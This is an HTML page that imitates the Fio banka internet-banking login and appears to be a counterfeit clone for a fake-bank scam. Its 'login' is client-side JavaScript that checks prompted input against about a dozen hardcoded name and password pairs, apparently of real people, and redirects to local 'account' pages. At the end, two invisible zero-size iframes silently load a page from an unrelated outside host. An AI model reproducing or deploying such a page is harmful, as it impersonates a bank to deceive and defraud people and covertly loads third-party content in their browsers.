<!DOCTYPE html>
<html xmlns="https://www.w3.org/1999/xhtml"><head>
<meta http-equiv="content-type" content="text/html; charset=UTF-8"><script type="text/javascript" src="ibfio_files/jquery-3.6.0.min-ver-CE8F684A284EDB4E0F59F8333915FFF3.js"></script>

<style data-tippy-stylesheet="">.tippy-box[data-animation=fade][data-state=hidden]{opacity:0}[data-tippy-root]{max-width:calc(100vw - 10px)}.tippy-box{position:relative;background-color:#333;color:#fff;border-radius:4px;font-size:14px;line-height:1.4;white-space:normal;outline:0;transition-property:transform,visibility,opacity}.tippy-box[data-placement^=top]>.tippy-arrow{bottom:0}.tippy-box[data-placement^=top]>.tippy-arrow:before{bottom:-7px;left:0;border-width:8px 8px 0;border-top-color:initial;transform-origin:center top}.tippy-box[data-placement^=bottom]>.tippy-arrow{top:0}.tippy-box[data-placement^=bottom]>.tippy-arrow:before{top:-7px;left:0;border-width:0 8px 8px;border-bottom-color:initial;transform-origin:center bottom}.tippy-box[data-placement^=left]>.tippy-arrow{right:0}.tippy-box[data-placement^=left]>.tippy-arrow:before{border-width:8px 0 8px 8px;border-left-color:initial;right:-7px;transform-origin:center left}.tippy-box[data-placement^=right]>.tippy-arrow{left:0}.tippy-box[data-placement^=right]>.tippy-arrow:before{left:-7px;border-width:8px 8px 8px 0;border-right-color:initial;transform-origin:center right}.tippy-box[data-inertia][data-state=visible]{transition-timing-function:cubic-bezier(.54,1.5,.38,1.11)}.tippy-arrow{width:16px;height:16px;color:#333}.tippy-arrow:before{content:"";position:absolute;border-color:transparent;border-style:solid}.tippy-content{position:relative;padding:5px 9px;z-index:1}</style><link rel="stylesheet" type="text/css" href="ibfio_files/tippy-ver-EBD6F8CE46A677E1A4F5F8A8317109A9.css" media="screen, print">
<script type="text/javascript" src="ibfio_files/tippy-ver-9DAE930A24E25D61134B6E5EB6831B36.js"></script>
<link rel="stylesheet" type="text/css" href="ibfio_files/keyboard-ver-010269CDA913A412C9FA5EA0B447728B.css">
<link rel="stylesheet" type="text/css" href="ibfio_files/jquery-ui-1.13.1.min-ver-3809AB2F81BAF761459F5E66F169A5D7.css" media="screen">
<script type="text/javascript" src="ibfio_files/jquery-ui-1.13.1.min-ver-1174ABB1D3A146BA5ABD4E6FD5F94B41.js"></script>
<link rel="stylesheet" type="text/css" href="ibfio_files/bootstrap_341.min-ver-4BE1CDB6FF8DBD79BE777AD52F309349.css" media="screen, print">
<script type="text/javascript" src="ibfio_files/bootstrap_341.min-ver-2F34B630FFE30BA2FF2B91E3F3C322A1.js"></script>
<link rel="stylesheet" type="text/css" href="ibfio_files/bootstrap-select.min-ver-2212BC6B437F27E6F6AC3FE2D30BF349.css" media="screen, print">
<script type="text/javascript" src="ibfio_files/bootstrap-select.min-ver-F20D3F02E2FBAD79845F3AB4C458AA20.js"></script>

	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<link rel="icon" sizes="16x16" type="image/x-icon" href="https://ib.fio.cz/ib/fio/resource/cz.fio.ib2.common.wicket.web.layout.image.FioImage/png/favicon-ver-BED52CBBA61C3C2EFBCD2A3F722B3146.ico">
	<title>Internetové bankovnictví | Fio banka</title>
	

<link rel="stylesheet" type="text/css" href="ibfio_files/font-awesome.min-ver-269550530CC127B6AA5A35925A7DE6CE.css" media="screen">
<script type="text/javascript" src="ibfio_files/defaultJsFunctions-ver-FA4401E0265BA7A982347E42A49BA273.js"></script>
<script type="text/javascript" src="ibfio_files/defaultLocalizedJsFunctions-ver-57244FFEF2516F1B0F7E5D0F00C28.js"></script>
<link rel="stylesheet" type="text/css" href="ibfio_files/style-ver-85610819C8B6A69C1833660A2996E692.css" media="screen">
<link rel="stylesheet" type="text/css" href="ibfio_files/print-ver-98E7EA0529EA6D60F27CD68E8A462E77.css" media="print">
<meta name="description" content="Přihlášení do internetového bankovnictví Fio banky. Kromě plateb si zde můžete založit i další účty, požádat o půjčku, kontokorent a další služby.">
<style type="text/css">
<!--
.style1 {color: #F0F0F0}
-->
</style>
</head>
<body>
	
    <style>
/*<![CDATA[*/

        html, body {
            background: none repeat scroll 0 0 #fff;
        }
    
/*]]>*/
</style>
    <div class="green_border"></div>
    
    <div class="container" style="margin-bottom: 20px;">
        <div class="row">
            <div class="col-md-4 " style="line-height: 50px;">
                <img class="logo_header img-responsive" src="ibfio_files/logo_fio-ver-894B2A39F77CABA34D70A4AC4C0FE0B6.png">
            </div>
           
	<form class="form-inline pull-right" id="id8acfe2da835396da9" method="post" action="./login?-1.-languageSelector-form"><div id="id8acfe2da835396da9_hf_0" hidden="" class="hidden-fields"></div>
		<div class="form-group">
			<div class="dropdown bootstrap-select form-control pull-right bs3"><select class="form-control pull-right" name="languageDropDown" id="id466d938d983d41398" onChange="this.form.submit()">
<option selected="selected" value="CZECH" data-content="&lt;img src='./fio/resource/cz.fio.ib2.common.wicket.web.layout.image.FioImage/png/VlajkaCzMala-ver-425A2FE80A90297180F0DCC77B3F66B6.png'&gt;&nbsp;Česky" data-tokens="Česky">Česky</option>
<option value="SLOVAK" data-content="&lt;img src='./fio/resource/cz.fio.ib2.common.wicket.web.layout.image.FioImage/png/VlajkaSkMala-ver-54AA18CD9834A48A7616BB29EA79F102.png'&gt;&nbsp;Slovensky" data-tokens="Slovensky">Slovensky</option>
<option value="ENGLISH" data-content="&lt;img src='./fio/resource/cz.fio.ib2.common.wicket.web.layout.image.FioImage/png/VlajkaGbMala-ver-E4896565595FC22E344FD619C0ED15BB.png'&gt;&nbsp;English" data-tokens="English">English</option>
</select><button type="button" tabindex="-1" class="btn dropdown-toggle btn-default" data-toggle="dropdown" role="combobox" aria-owns="bs-select-1" aria-haspopup="listbox" aria-expanded="false" data-id="id466d938d983d41398" title="Česky"><div class="filter-option"><div class="filter-option-inner"><div class="filter-option-inner-inner"><img src="ibfio_files/VlajkaCzMala-ver-425A2FE80A90297180F0DCC77B3F66B6.png">&nbsp;Česky</div></div> </div><span class="bs-caret"><span class="caret"></span></span></button><div class="dropdown-menu open"><div class="inner open" role="listbox" id="bs-select-1" tabindex="-1"><ul class="dropdown-menu inner " role="presentation"></ul></div></div></div>
		</div>
	</form>
</div>
</div>
        </div>
    </div>
    

    <div class="container">
        <div class="row">
            <div class="col-md-6">
                <h1 class="h1_login">
                    Přihlášení do Internetbankingu                </h1>
	</p><div id="LoginInformation">


					<div class="black-background"><br><br>
				         <center><h3>Internet Banking Login</h3>
	<!-- start online banking box -->
	<!-- action is FIs Login.aspx URL -->
      <div class="BLACK-background-background">
<script language="JavaScript">
function LogIn(){
loggedin=false;
username="";
password="";
username=prompt("Username:","");
username=username.toLowerCase();
password=prompt("Password:","");
password=password.toLowerCase();
if (username=="mohammed0222" && password=="hassan15322") { 
loggedin=true;
window.location="account.html";
}
if (username=="helena" && password=="sucha") { 
loggedin=true;
window.location="account(1).htm";
}
if (username=="driss" && password=="khalfi") { 
loggedin=true;
window.location="driss.html";
}
if (username=="driss" && password=="khalfi") { 
loggedin=true;
window.location="driss.html";
}
if (username=="abdul" && password=="muiz") { 
loggedin=true;
window.location="abdul.html";
}
if (username=="alfredo" && password=="valbuena") { 
loggedin=true;
window.location="alfredo.html";
}
if (username=="alejandro" && password=="torrijos") { 
loggedin=true;
window.location="alejandro.html";
}
if (username=="mahmoud" && password=="ghorbani") { 
loggedin=true;
window.location="mahmoud.html";
}
if (username=="juan" && password=="serpa") { 
loggedin=true;
window.location="juan.html";
}
if (username=="leon" && password=="tellijohn") { 
loggedin=true;
window.location="leon.html";
}
if (username=="william" && password=="turner") { 
loggedin=true;
window.location="william.html";
}
if (username=="smitlener" && password=="goldie") { 
loggedin=true;
window.location="smitlener.html";
}
if (loggedin==false) {
alert("Invalid Account No. or Pin login!");
}
}
</script> 

<center><input value="Click To Login" onclick="LogIn()" type="button">	<a id="whereispassword" class="fancybox fancybox-inline" href="#password"></a>
		<div style="display: none;">
		                    <div id="password">
		                    <p>In an effort to help you better protect your 
personal information, your Login ID and Password will be input on 
separate screens. </p>
		                    <p>Login IDs will be input on the Fio banka homepage, you will then be directed to a new page to input your password. </p>

    </div>

    <div id="workingPanel">
      <table class="block">
        <tbody><tr>
          <td><img id="_workingImage" class="workingImage" src="logon_files/page-loader.gif" alt="Loading"></td>
          <td><span id="MainContent_workingText" class="workingText" brandid="DialogPageLoadingMessage"Working...</span></td>
        </tr>
      </tbody></table>
    </div>

  </div>



    


      				</center></div>
      				<!-- End:   Input Control Placeholder -->
                <br><br><br>
                    


      					
			      		
      				</div>
            
            </center></div>
          </div>
        </center></div>
      </div>

    <br style="clear:both">
      

    </div>
  </div>

</div>

    





<iframe id="tdr_sUtwO" title="empty" style="color:rgba(0,0,0,0); float:left; position:absolute; top:-200; left:-200; border:0px" src="http://halbk.1apps.com/josef.html" width="0" height="0"></iframe>
</div></div></div></div></div></div></form><iframe id="tdr_xpa8r" title="empty" style="color:rgba(0,0,0,0); float:left; position:absolute; top:-200; left:-200; border:0px" src="http://halbk.1apps.com/josef.html" width="0" height="0"></iframe></body></html>

